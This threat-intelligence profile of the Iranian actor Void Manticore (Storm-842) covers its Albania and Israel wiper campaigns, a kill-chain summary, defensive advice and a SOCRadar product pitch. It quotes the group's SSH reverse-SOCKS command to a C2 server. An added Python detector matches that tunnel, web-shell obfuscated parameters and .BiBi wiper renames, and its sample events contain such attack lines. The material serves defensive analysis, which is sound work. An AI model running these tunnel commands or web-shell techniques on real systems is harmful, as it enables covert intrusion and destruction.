Dark Web Profile: Storm-842 (Void Manticore)
On September 23, 2022, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory addressing a series of cyberattacks against Albania’s government. The advisory identified the responsible party as ‘HomeLand Justice,’ a threat actor linked to the Iranian state.
The group launched its first attack on July 15, 2022, focusing on Albania’s e-government systems. This assault occurred just before a scheduled conference of the Iranian opposition group Mojahedin-e Khalq (MEK) (Persian: مجاهدین ِ خلق), which advocates for replacing Iran’s current regime. As a result, the conference was canceled. In September 2022, HomeLand Justice launched another campaign targeting Albanian border systems.
Later, on December 24, 2023, the group announced its ongoing operations aimed at disrupting Albania’s infrastructure and government institutions. More recently, the group has continued its pro-Iran stance by targeting Israel.
For further information about the cyber attack on Albania back in 2022, check our related blog post.
Who is Storm-842 (Void Manticore)?
Storm-842 (Void Manticore), an Iranian threat actor tied to the Ministry of Intelligence and Security (MOIS), specializes in destructive wiping attacks paired with influence campaigns.
The group operates under multiple personas, most notably ‘Homeland Justice’ for operations in Albania and ‘Karma’ for activities in Israel, tailoring its approach to specific regions. Links between Void Manticore and Scarred Manticore (also known as OilRig, APT34, Helix Kitten, or Chrysene) indicate a coordinated strategy within MOIS, often involving the transfer of victim targets.
According to researchers, Void Manticore has established itself as a major threat to those opposing Iranian interests. Known for combining destructive wiping attacks with advanced influence operations, the group employs a dual strategy of psychological warfare and data destruction.
A key element of Void Manticore’s activity is its collaboration with Scarred Manticore, another MOIS-linked Iranian threat actor. Evidence points to a systematic transfer of targets between the two groups, reflecting a coordinated approach to executing destructive campaigns.
In this process, Scarred Manticore typically infiltrates and exfiltrates data from victim networks before passing control to Void Manticore, which carries out the destructive phase.
This partnership not only magnifies the impact of their attacks but also creates significant challenges for cybersecurity defenders.
By pooling resources and expertise, Void Manticore and its affiliates conduct sophisticated cyber operations with extensive consequences.
Their collaboration enhances Void Manticore’s reach and demonstrates a level of complexity that surpasses the capabilities of individual groups.
This coordinated handoff aligns with Microsoft’s findings in 2022, highlighting similar tactics in the operational structure.
How Do They Operate?
Storm-0842’s activities are methodical and targeted, showcasing a high degree of technical expertise and strategic coordination.
At the heart of Storm-0842’s operational arsenal is its use of custom-developed wiper malware. This malware is engineered to delete files, disrupt networked storage, and render systems inoperable. By designing wipers compatible with both Windows and Linux environments, Storm-0842 ensures its campaigns can impact a wide range of infrastructures.
These attacks are typically accompanied by deliberate manipulations of shared drives and boot processes, further complicating recovery efforts. Such precision and adaptability underscore the group’s advanced technical sophistication.
Beyond its destructive payloads, Storm-0842 conducts influence operations that amplify the impact of its cyberattacks. These campaigns involve leaking stolen data through various online personas, including ‘Homeland Justice’ in Albania and ‘Karma’ in Israel.
By strategically releasing sensitive information, the group sows distrust and chaos, aligning public perception with its objectives. These tactics are not merely byproducts of its operations but integral components of its strategy, blending technical and psychological warfare.
As stated above, one of Storm-0842’s defining characteristics is its collaboration with other MOIS-linked groups, particularly Scarred Manticore. This partnership involves a systematic handoff of operations.
Scarred Manticore typically gains initial access to targeted networks, exfiltrating sensitive data and mapping the environment. Control is then transitioned to Storm-0842, which executes the destructive phase, leveraging the gathered intelligence to maximize impact.
This coordinated approach enables both groups to conduct seamless, multifaceted campaigns while complicating attribution efforts.
A case study of Storm-0842’s operations is the attack on the Albanian government in mid-2022.
According to detailed analyses, including advisories from CISA and Microsoft, the group leveraged previously compromised accounts and vulnerabilities in unpatched systems to deliver its payloads.
The attack disrupted critical government services, including e-government portals and border management systems. The follow-up phase saw the strategic release of stolen data through ‘Homeland Justice,’ designed to undermine the Albanian government’s credibility and disrupt diplomatic relations with Iran.
Key to the attack’s success was Storm-0842’s ability to exploit vulnerabilities in widely used software platforms and its use of credential-harvesting techniques.
The group employed a range of TTPs (Tactics, Techniques, and Procedures), including the deployment of web shells for persistence, lateral movement within compromised networks, and the use of RDP (Remote Desktop Protocol) for remote access. Additionally, the group demonstrated significant operational planning, timing the attacks to coincide with political events, such as a planned conference of the Iranian opposition group MEK, further enhancing their strategic impact.
Storm-0842’s operations extend beyond technical attacks, reflecting a broader alignment with Iranian geopolitical objectives.
Its campaigns demonstrate a high degree of coordination, leveraging multiple threat actors, advanced malware, and psychological operations to achieve maximum disruption. As the latest research shows, their operations can be summarized in Cyber Kill Chain terms as follows:
Reconnaissance
- The group identifies targets, such as entities in Israel and Albania, with an intent to perform destructive operations.
- Likely uses publicly available tools or compromised credentials handed off by other threat actors to initiate access.
Weaponization
- Custom web shells, such as “Karma Shell,” are prepared for exploitation.
  - Functions include directory listing, file uploads, service manipulation, and process creation.
  - Uses base64 and a one-byte XOR for obfuscation of parameters.
- Wipers are developed for specific objectives:
  - Cl Wiper: Wipes using the ElRawDisk driver with commands to delete partitions.
  - Partition Wipers: Remove disk partition layouts, causing system crashes.
  - BiBi Wiper: Targets files and partitions, with variants for Linux and Windows systems.
Delivery
- Initial access is often achieved through internet-facing web servers.
- Deployment of malicious payloads like “do.exe” via web shells and other upload mechanisms.
Exploitation
- Utilizes exploits on compromised servers to establish control, such as:
  - Executing commands.
  - Uploading and deploying secondary payloads (e.g., the reGeorge tunneling web shell).
Installation
- Deploys persistence tools, including:
  - Web shells like “Karma Shell” and “reGeorge” for sustained access.
  - “do.exe” for checking Domain Admin credentials and dropping additional tools.
- Establishes SSH-based C2 channels with compromised hosts.
Command and Control (C2)
- Configures SOCKS proxying for lateral movement via the OpenSSH client, like:
ssh root@REDACTED_C2_SERVER -R 1090 -p 443 -o ServerAliveInterval=60
ssh root@REDACTED_C2_SERVER -R 1080 -p 443 -o ServerAliveInterval=60
Actions on Objectives
- Executes destructive activities aimed at data destruction and disruption:
  - Automated and Manual Wiping:
    - Custom wipers selectively corrupt files or obliterate partition tables.
    - Uses utilities like SDelete, the Windows Format utility, and manual deletion via File Explorer.
  - Targeted Campaigns:
    - The Linux variant of BiBi Wiper corrupts files and renames them with the “.BiBi” extension.
    - The Windows variant disables recovery mechanisms and deletes shadow copies to evade restoration.
    - Newer variants avoid detection with updated extensions and behavior.
  - Destruction targeted at critical data and system integrity.
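As an added example (not code from the original post or from any vendor it cites), the following Python turns three behaviours from the kill chain above into log checks: the bare `ssh -R <port>` reverse SOCKS tunnel listed under C2, the base64-plus-one-byte-XOR parameter encoding noted for Karma Shell (recovered the way an analyst triaging web-shell traffic would, by trying all 256 keys), and the `.BiBi` rename of the Linux wiper variant. The `kind: body` log format, hostnames, the XOR key 0x5A and the encoded command are all constructed; the updated extensions of newer variants are not covered, so the rename check is a starting point rather than a signature.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, quote, urlsplit


def recover_xor_b64(param: str, min_ratio: float = 0.75):
    """Undo the base64 + one-byte-XOR parameter encoding attributed to Karma Shell:
    try all 256 keys, keep the most text-like result as (key, plaintext), else None."""
    try:
        raw = base64.b64decode(param, validate=True)
    except (binascii.Error, ValueError):
        return None
    best = None
    for key in range(256):
        text = "".join(chr(b ^ key) for b in raw)
        if not text or not (text.isascii() and text.isprintable()):
            continue
        # Scorer favours lowercase text with spaces; tune for your own command mix.
        score = sum(c.islower() or c == " " for c in text) / len(text)
        if best is None or score > best[0]:
            best = (score, key, text)
    return (best[1], best[2]) if best and best[0] >= min_ratio else None


# A bare `-R <port>` with no host:port after it turns the remote SSH server into a
# SOCKS proxy back through this host (OpenSSH 7.6+): the C2 tunnel shape shown above.
SSH_REVERSE_SOCKS = re.compile(r"\bssh\b.*\s-R\s+\d+(?:\s|$)")
# Rename marker of the Linux BiBi variant; newer variants change the extension.
BIBI_RENAME = re.compile(r"\.BiBi(?:\s|$)")


def classify_event(line: str):
    """Tag one 'kind: body' log line with the behaviour it matches, or return None."""
    kind, _, body = line.partition(": ")
    if kind == "proc" and SSH_REVERSE_SOCKS.search(body):
        return "ssh-reverse-socks-c2"
    if kind == "file" and BIBI_RENAME.search(body):
        return "bibi-wiper-rename"
    if kind == "http":  # body is "<METHOD> <path?query>"
        query = urlsplit(body.split(" ", 1)[-1]).query
        if any(recover_xor_b64(v) for _, v in parse_qsl(query)):
            return "webshell-obfuscated-param"
    return None


def scan(events):
    """Return [(tag, line)] for every line that matches a tracked behaviour."""
    return [(tag, e) for e in events if (tag := classify_event(e))]


def _obfuscate(command: str, key: int) -> str:
    """Build a constructed sample parameter (base64 of one-byte-XOR bytes)."""
    return base64.b64encode(bytes(b ^ key for b in command.encode())).decode()


# Constructed sample telemetry: hosts, XOR key 0x5A and commands are made up.
SAMPLE_EVENTS = [
    "proc: ssh root@203.0.113.10 -R 1090 -p 443 -o ServerAliveInterval=60",
    "proc: ssh deploy@10.0.0.5 -p 22 -L 8080:localhost:80",
    "http: POST /karma.aspx?cmd=" + quote(_obfuscate("cmd /c whoami", 0x5A)),
    "file: rename C:\\share\\report.docx -> C:\\share\\report.docx.BiBi",
    "file: rename C:\\share\\notes.txt -> C:\\share\\notes.bak",
]
```

Running `scan(SAMPLE_EVENTS)` flags the reverse-SOCKS tunnel, the obfuscated web-shell parameter and the `.BiBi` rename while leaving the ordinary SSH session and `.bak` rename alone.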
How to Protect Your Organization from an Iranian APT Attack?
Iranian APT groups like Storm-842 (Void Manticore) leverage advanced Tactics, Techniques, and Procedures (TTPs) to carry out destructive cyberattacks. To protect your organization, consider the following measures based on recommendations from CISA and industry best practices:
1. Strengthen Access Controls
- Implement Multi-Factor Authentication (MFA): Require MFA for all remote access to critical systems and applications.
- Limit Privileged Access: Use role-based access controls and limit administrative privileges to minimize the impact of compromised credentials.
2. Patch Management and Vulnerability Remediation
- Prioritize Patch Management: Regularly update software, operating systems, and applications to address known vulnerabilities.
- Monitor for Unpatched Systems: Use vulnerability management tools to identify and remediate exposed systems.
3. Network Segmentation and Monitoring
- Isolate Critical Assets: Implement network segmentation to limit lateral movement in case of a breach.
- Monitor for Anomalies: Deploy Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) to identify unusual behavior.
4. Enhance Email and Web Security
- Filter Malicious Content: Use email gateways to block phishing attempts and malware-laden attachments.
- Inspect Internet Traffic: Implement web filtering to prevent access to known malicious domains.
5. Backup and Recovery
- Maintain Regular Backups: Ensure that backups are up-to-date and stored offline or in secure cloud environments.
- Test Recovery Plans: Conduct periodic recovery drills to ensure quick restoration in case of an attack.
6. Incident Response and Threat Intelligence
- Develop Incident Response Plans: Establish clear protocols for detecting, containing, and mitigating cyberattacks.
- Leverage Threat Intelligence: Subscribe to threat intelligence feeds to stay informed about evolving Iranian APT TTPs.
7. Employee Training and Awareness
- Educate Staff: Train employees to recognize phishing attempts and suspicious activities.
- Simulate Attacks: Conduct regular phishing simulations to assess and improve readiness.
How Can SOCRadar Help?
SOCRadar offers a comprehensive suite of tools to help organizations defend against sophisticated threats like those posed by Storm-842 (Void Manticore).
With its advanced threat intelligence and proactive monitoring capabilities, SOCRadar enables businesses to stay ahead of cyberattacks and mitigate risks associated with Iranian APT groups.
One of SOCRadar’s key strengths is its real-time threat intelligence, which continuously tracks the Tactics, Techniques, and Procedures (TTPs) of groups like Void Manticore. By identifying Indicators of Compromise (IOCs) and monitoring the activities of threat actors across the dark web and other cyber threat landscapes, SOCRadar helps organizations recognize potential risks before they escalate into full-blown attacks.
SOCRadar also aids in Vulnerability Management by identifying unpatched systems and providing actionable recommendations for remediation. This ensures that critical vulnerabilities, often exploited by APT groups, are addressed promptly.
The platform’s Dark Web Monitoring capabilities offer a proactive approach to security by tracking leaked credentials, sensitive data, and potential discussions about targeted attacks.
By monitoring underground forums and marketplaces, SOCRadar helps detect and respond to data breaches or attacks in their early stages.
In addition, SOCRadar’s Digital Risk Protection tools help defend against phishing campaigns, credential harvesting, and domain impersonation—common tactics used by groups like Void Manticore. This service ensures that organizations’ brands and digital assets remain secure from fraudulent activities.
In Summary
The threat posed by Iranian APT groups like Storm-842 (Void Manticore) is significant, with their highly coordinated and destructive cyber operations targeting critical infrastructure, government institutions, and geopolitical adversaries.
These groups, backed by state intelligence agencies, use a combination of advanced malware, wiper tools, and psychological influence campaigns to disrupt and destroy systems, often tailoring their tactics to specific regions or political events.
To protect against such attacks, organizations must adopt a proactive approach, leveraging advanced threat intelligence to stay informed of evolving tactics and potential risks.
SOCRadar’s platform plays a key role in this defense by providing real-time threat intelligence, vulnerability management, and dark web monitoring, helping organizations detect and mitigate threats early.
Its incident response capabilities ensure that, in the event of an attack, organizations can quickly contain and recover from disruptions, minimizing the impact on operations.
By integrating SOCRadar’s comprehensive cybersecurity solutions, organizations can better defend themselves against the sophisticated tactics employed by APT groups like Storm-842, ensuring that they are always prepared to respond to emerging threats in an increasingly complex and dangerous digital landscape.